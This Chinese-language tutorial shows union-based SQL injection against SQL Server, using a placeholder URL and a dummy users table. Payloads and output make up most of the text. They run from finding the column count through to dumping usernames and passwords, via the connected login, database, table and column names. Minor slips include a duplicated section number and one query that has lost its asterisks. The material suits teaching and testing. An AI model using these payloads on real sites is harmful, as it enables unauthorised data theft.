0x00 概要

在页面有显示位的情况下使用

0x01 测试数据

  1. 1> select * from article;
  2. 2> go
  3. +----+-----------+-----------+
  4. | id | title | content |
  5. +----+-----------+-----------+
  6. | 1 | 测试标题 | 测试内容 |
  7. | 2 | 测试标题2 | 测试内容2 |
  8. +----+-----------+-----------+
  9. (2 rows affected)
  1. # 测试表数据: users;
  2. sql server> select * from users;
  3. +----+--------------+----------+
  4. | id | username | password |
  5. +----+--------------+----------+
  6. | 1 | test-user-01 | 123456 |
  7. | 2 | test-user-02 | 234567 |
  8. +----+--------------+----------+
  9. 2 rows in set (0.00 sec)
  1. sql server> SELECT system_user;
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | sa |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)
  1. sql server> select db_name();
  2. +-----------------------+
  3. | field1 |
  4. +-----------------------+
  5. | test |
  6. +-----------------------+
  7. 1 row in set (0.00 sec)

0x02 查看列数

web语句: http://www.test.com/sql.php?id=1 order by 3

数据库语句: select * from users where id=1 order by 3

  1. # 正确的时候 会返回原来的数据
  2. +-----+--------------+------------+
  3. | id | username | password |
  4. +--------+------------+-----------+
  5. | 1 | test-user-01 | 123456 |
  6. +-----+--------------+------------+
  7. (1 rows affected)
  1. # 错误的时候
  2. sql server> select * from users where id=1 order by 4;
  3. 42000 - [SQL Server]ORDER BY 位置号 4 超出了选择列表中项数的范围。

0x03 爆当前连接用户

web语句: http://www.test.com/sql.php?id=-1 union select system_user,null,null

数据库语句: select * from users where id=-1 union select system_user,null,null

  1. 1> select * from users where id=-1 union select system_user,null,null;
  2. +----+----------+-----------+
  3. | id | username | password |
  4. +----+----------+-----------+
  5. | sa | null | null |
  6. +----+----------+-----------+
  7. (1 rows affected)

0x04 爆当前连接的数据库

web语句: http://www.test.com/sql.php?id=-1 union select null,db_name(),null

数据库语句: select * from users where id=-1 union select null,db_name(),null

  1. 1> select * from users where id=-1 union select null,db_name(),null;
  2. +----+----------+-----------+
  3. | id | username | password |
  4. +----+----------+-----------+
  5. |null| test | null |
  6. +----+----------+-----------+
  7. (1 rows affected)

0x05 爆库名方法一

注意: db_name(1) 修改会显示其他库名
例如:
修改为db_name(1) 就是出1库
修改为db_name(2) 就是出2库

web语句: http://www.test.com/sql.php?id=-1 union select null,db_name(1),null

数据库语句: select * from users where id=-1 union select null,db_name(1),null

  1. # 获取 1库
  2. 1> select * from users where id=-1 union select null,db_name(1),null;
  3. +------+----------+-----------+
  4. | id | username | password |
  5. +------+----------+-----------+
  6. | NULL | master | NULL |
  7. +------+----------+-----------+
  8. (1 rows affected)
  1. # 获取 2库
  2. 1> select * from users where id=-1 union select null,db_name(2),null;
  3. +------+----------+-----------+
  4. | id | username | password |
  5. +------+----------+-----------+
  6. | NULL | tempdb | NULL |
  7. +------+----------+-----------+
  8. (1 rows affected)

0x06 爆库名方法二

优点:简单
缺点:要是查询的 dbid 刚好不存在,那么就会查询不出数据

查询不同的库可以这样
例如:
修改 dbid>=1
修改 dbid>=2

web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1

数据库语句: select * from users where id=-1 union select top 1 null,name,null from master.dbo.sysdatabases where dbid>=1

  1. # 获取 1库
  2. 1> SELECT
  3. *
  4. FROM
  5. users
  6. WHERE
  7. id =- 1
  8. UNION
  9. SELECT
  10. TOP 1 NULL,
  11. name,
  12. NULL
  13. FROM
  14. master.dbo.sysdatabases
  15. WHERE
  16. dbid >= 1;
  17. +------+----------+-----------+
  18. | id | username | password |
  19. +------+----------+-----------+
  20. | NULL | master | NULL |
  21. +------+----------+-----------+
  22. (1 rows affected)
  1. # 获取 2库
  2. 1> SELECT
  3. *
  4. FROM
  5. users
  6. WHERE
  7. id =- 1
  8. UNION
  9. SELECT
  10. TOP 1 NULL,
  11. name,
  12. NULL
  13. FROM
  14. master.dbo.sysdatabases
  15. WHERE
  16. dbid >= 2;
  17. +------+----------+-----------+
  18. | id | username | password |
  19. +------+----------+-----------+
  20. | NULL | tempdb | NULL |
  21. +------+----------+-----------+
  22. (1 rows affected)

0x06 爆库名方法三

优点:可以保证每个 row_number 都是查询的到的

注意:
OVER(Order by dbid) 里面的 dbid 要修改为 master.dbo.sysdatabases 表里面存在的一个字段

查询不同的库可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1

数据库语句: select * from users where id=-1 union select top 1 null,a.name,null from (select ROW_NUMBER() OVER(Order by dbid) AS row_number,name from master.dbo.sysdatabases) as a where row_number=1

  1. # 获取 1库
  2. 1> SELECT
  3. *
  4. FROM
  5. users
  6. WHERE
  7. id =- 1
  8. UNION
  9. SELECT
  10. TOP 1 NULL,
  11. a.name,
  12. NULL
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY dbid) AS row_number,
  17. name
  18. FROM
  19. master.dbo.sysdatabases
  20. ) AS a
  21. WHERE
  22. row_number = 1;
  23. +------+----------+-----------+
  24. | id | username | password |
  25. +------+----------+-----------+
  26. | NULL | master | NULL |
  27. +------+----------+-----------+
  28. (1 rows affected)
  1. 1> SELECT
  2. *
  3. FROM
  4. users
  5. WHERE
  6. id =- 1
  7. UNION
  8. SELECT
  9. TOP 1 NULL,
  10. a.name,
  11. NULL
  12. FROM
  13. (
  14. SELECT
  15. ROW_NUMBER () OVER (ORDER BY dbid) AS row_number,
  16. name
  17. FROM
  18. master.dbo.sysdatabases
  19. ) AS a
  20. WHERE
  21. row_number = 2;
  22. +------+----------+-----------+
  23. | id | username | password |
  24. +------+----------+-----------+
  25. | NULL | tempdb | NULL |
  26. +------+----------+-----------+
  27. (1 rows affected)

0x07 爆表名

注意:
OVER(Order by table_name) 里面的 table_name 要修改为 information_schema.tables 表里面存在的一个字段

查询不同的库可以这样
例如:
table_catalog=db_name() (查询当前库)
table_catalog=’要查询的库名’

查询不同的表可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1

数据库语句: select * from users where id=-1 union select top 1 null,a.table_name,null from (select ROW_NUMBER() OVER(Order by table_name) AS row_number,table_name FROM information_schema.tables where table_catalog=db_name()) as a where row_number=1

  1. # 爆 1表
  2. 1> SELECT
  3. *
  4. FROM
  5. users
  6. WHERE
  7. id =- 1
  8. UNION
  9. SELECT
  10. TOP 1 NULL,
  11. a.table_name,
  12. NULL
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  17. table_name
  18. FROM
  19. information_schema.tables
  20. WHERE
  21. table_catalog = db_name()
  22. ) AS a
  23. WHERE
  24. row_number = 1;
  25. 2> go
  26. +------+----------+-----------+
  27. | id | username | password |
  28. +------+----------+-----------+
  29. | NULL | article | NULL |
  30. +------+----------+-----------+
  31. (1 rows affected)
  1. # 爆 2表
  2. 1> SELECT
  3. *
  4. FROM
  5. users
  6. WHERE
  7. id =- 1
  8. UNION
  9. SELECT
  10. TOP 1 NULL,
  11. a.table_name,
  12. NULL
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY table_name) AS row_number,
  17. table_name
  18. FROM
  19. information_schema.tables
  20. WHERE
  21. table_catalog = db_name()
  22. ) AS a
  23. WHERE
  24. row_number = 2;
  25. 2> go
  26. +------+----------+-----------+
  27. | id | username | password |
  28. +------+----------+-----------+
  29. | NULL | users | NULL |
  30. +------+----------+-----------+
  31. (1 rows affected)

0x08 暴字段

注意:
OVER(Order by column_name) 里面的 column_name 要修改为 information_schema.columns 表里面存在的一个字段

查询不同的表可以这样
例如:
table_name=’要查询的表名’

查询不同的字段可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=-1 union select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1

数据库语句: select top 1 null,a.column_name,null from (select ROW_NUMBER() OVER(Order by column_name) AS row_number,column_name from information_schema.columns where table_catalog=db_name() and table_name=’users’) as a where row_number=1

  1. # 获取当前库 users表 第一个字段名称
  2. 1>
  3. SELECT
  4. TOP 1 NULL,
  5. a.column_name,
  6. NULL
  7. FROM
  8. (
  9. SELECT
  10. ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  11. column_name
  12. FROM
  13. information_schema.columns
  14. WHERE
  15. table_catalog = db_name()
  16. AND table_name = 'users'
  17. ) AS a
  18. WHERE
  19. row_number = 1;
  20. 2> go
  21. +------+-------------+------+
  22. | | column_name | |
  23. +------+-------------+------+
  24. | NULL | id | NULL |
  25. +------+-------------+------+
  26. (1 rows affected)
  1. # 获取当前库 users表 第二个字段名称
  2. 1>
  3. SELECT
  4. TOP 1 NULL,
  5. a.column_name,
  6. NULL
  7. FROM
  8. (
  9. SELECT
  10. ROW_NUMBER () OVER (ORDER BY column_name) AS row_number,
  11. column_name
  12. FROM
  13. information_schema.columns
  14. WHERE
  15. table_catalog = db_name()
  16. AND table_name = 'users'
  17. ) AS a
  18. WHERE
  19. row_number = 2;
  20. 2> go
  21. +------+-------------+------+
  22. | | column_name | |
  23. +------+-------------+------+
  24. | NULL | password | NULL |
  25. +------+-------------+------+
  26. (1 rows affected)

0x09 爆内容


注意:
OVER(Order by username) 里面的 username 要修改为 users 表里面存在的一个字段

查询不同的数据可以这样
例如:
修改 row_number>=1
修改 row_number>=2

web语句: http://www.test.com/sql.php?id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number,* from users) as a where row_number=1

数据库语句: select from users where id=-1 union select a.id,a.username,a.password from (SELECT ROW_NUMBER () OVER (ORDER BY username) AS row_number, from users) as a where row_number=1

  1. # 查询users表 第一条数据
  2. 1> SELECT
  3. *
  4. FROM
  5. users
  6. WHERE
  7. id =- 1
  8. UNION
  9. SELECT
  10. a.id,
  11. a.username,
  12. a.password
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  17. FROM
  18. users
  19. ) AS a
  20. WHERE
  21. row_number = 1;
  22. 2> go
  23. +--------+------------+-----------+
  24. | id | username | password |
  25. +--------+------------+-----------+
  26. | 1 | test-user-01 | 123456 |
  27. +--------+------------+-----------+
  28. (1 rows affected)
  1. # 查询users表 第二条数据
  2. 1> SELECT
  3. *
  4. FROM
  5. users
  6. WHERE
  7. id =- 1
  8. UNION
  9. SELECT
  10. a.id,
  11. a.username,
  12. a.password
  13. FROM
  14. (
  15. SELECT
  16. ROW_NUMBER () OVER (ORDER BY username) AS row_number ,*
  17. FROM
  18. users
  19. ) AS a
  20. WHERE
  21. row_number = 2;
  22. 2> go
  23. +--------+------------+-----------+
  24. | id | username | password |
  25. +--------+------------+-----------+
  26. | 2 | test-user-02 | 234567 |
  27. +--------+------------+-----------+
  28. (1 rows affected)